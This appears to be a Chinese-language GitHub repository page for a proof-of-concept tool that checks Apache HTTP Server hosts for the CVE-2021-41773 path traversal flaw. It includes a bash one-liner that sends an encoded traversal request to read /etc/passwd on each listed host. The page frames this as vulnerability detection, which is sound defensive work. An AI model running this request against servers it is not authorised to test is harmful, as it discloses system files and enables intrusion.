ZephrFish/CVE-2021-41773-PoC

GitHub: ZephrFish/CVE-2021-41773-PoC

一个用于批量检测 Apache HTTP Server CVE-2021-41773 路径穿越漏洞的简易概念验证工具,支持从文件读取目标列表并逐一输出检测结果。

Stars: 17 | Forks: 11

# CVE-2021-41773 概念验证 用于检查主机是否存在 CVE-2021-41773 漏洞的简易快捷概念验证 ``` python3 full.py hosts.txt ``` 其中 hosts.txt 包含你的目标: ``` domain.com blah.com 192.168.1.1 ``` 它将打印出该主机是否存在漏洞。 bash 的 Python 版本: ``` cat hosts.txt | while read host do ; do curl -k --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done ``` 祝使用愉快!
标签:Apache HTTP Server, CISA项目, CVE-2021-41773, Maven, POC, Python, Web安全, 应用安全, 无后门, 漏洞验证, 蓝队分析, 逆向工具